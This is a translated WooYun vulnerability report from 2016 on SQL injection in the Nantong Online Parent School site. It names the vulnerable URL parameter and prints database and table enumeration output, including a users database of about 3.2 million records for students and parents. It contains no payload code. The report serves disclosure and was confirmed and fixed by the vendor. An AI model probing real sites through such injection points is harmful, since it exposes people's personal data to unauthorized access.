
Vulnerability Summary

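Vulnerability ID: wooyun-2016-0187971

Title: Nantong Online Parent School SQL injection allows extensive cross-database queries (3 million user records involved)

Vendor: ntjxt.com

Author: 黑色键盘丶

Submitted: 2016-04-12 16:18

Fixed: 2016-05-27 19:10

Published: 2016-05-27 19:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]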



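Vulnerability Details

Disclosure status:

2016-04-12: Details sent to the vendor; awaiting vendor action
2016-04-12: Vendor confirmed; details disclosed to the vendor only
2016-04-22: Details disclosed to core white hats and experts in related fields
2016-05-02: Details disclosed to regular white hats
2016-05-12: Details disclosed to trainee white hats
2016-05-27: Details disclosed to the public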

Brief description:

RT

Detailed description:

Injection point: http://www.ntjxt.com/areas?area_id=1


Databases

available databases [12]:
[*] COMMUNITY_ONLINE
[*] CTXSYS
[*] ESCHOOL30
[*] EXFSYS
[*] GATEWAY
[*] MDSYS
[*] OLAPSYS
[*] PARENTSCHOOL
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XUEXI6_PARENTSCHOOL



Database: PARENTSCHOOL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| SESSIONS | 11057339 |
| PAGE_RECORDS | 8907483 |
| ACTIVITY_MESSAGES | 1530992 |
| BLESSINGS | 962585 |
| BOOK_MESSAGES | 545177 |
| BOOK_ACTIVITIES | 333791 |
| LOTTERY_RECORDS | 89213 |
| ACTION_RECORDS | 85368 |
| FOCUS | 69882 |
| NEWS_LINES | 20725 |
| BOOK_EXCHANGES | 8830 |
| BOTTLE_USER_RELATIONS | 8596 |
| LINSHI | 8286 |
| PAPER_RESULTS | 5733 |
| AWARD_USER_RELATIONS | 5581 |
| BOTTLES | 4705 |
| BOOK_ACTIVITY_AWARDS | 3785 |
| QUEUE_MESSAGES | 1083 |
| QUESTIONS | 1060 |
| BOOK_AWARD_USERS | 887 |
| RESOURCES | 655 |
| SCHOOL_TYPES | 574 |
| SCHOOLS | 512 |
| AREA_NEWS | 493 |
| ARTICLES | 459 |
| BOOK_ARTICLES | 434 |
| BOOK_SETTINGS | 168 |
| LECTURE_COMMENTS | 134 |
| ARTICLE_COMMENTS | 113 |
| INDEX_SETTINGS | 86 |
| ACTIVITY_PICTURES | 74 |
| DANGERS | 68 |
| LOTTERY_SETTINGS | 61 |
| LECTURES | 52 |
| ACTIVITY_AWARDS | 36 |
| RESOURCE_TYPES | 27 |
| BEAUTIES | 23 |
| NEWS_TYPES | 23 |
| BOOK_LISTINGS | 16 |
| PAPER_OPTIONS | 10 |
| AREA_MANAGERS | 9 |
| SONGS | 8 |
| WAITING_MESSAGE_LOGS | 6 |
| PAPER_QUESTIONS | 3 |
| NOTICES | 2 |
| ACTIVITY_REPORTS | 1 |
| PAPERS | 1 |
+-----------------------+---------+


Database reachable by cross-database query, with over 3 million user records

Database: ESCHOOL30
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| GROUP_USER_RELATIONS | 3276581 |
| USERS | 3252938 |
| STUDENTS | 1577602 |
| PARENTS | 1565084 |
| SEND_SERVICE_RELATIONS | 333491 |
| TEACHERS | 89003 |
| WAITING_MESSAGES | 86689 |
| USER_GROUPS | 83326 |
| WAITING_MESSAGE_RECORDS | 7674 |
| SCHOOL_INFOS | 934 |
+-------------------------+---------+


Proof of vulnerability:

Injection point: http://www.ntjxt.com/areas?area_id=1



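Fix:

Filter input.

Copyright notice: when reposting, credit the source 黑色键盘丶@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-04-12 19:05

Vendor reply:

Part of the information has not been maintained since 2011; there are indeed vulnerabilities.

Latest status:

None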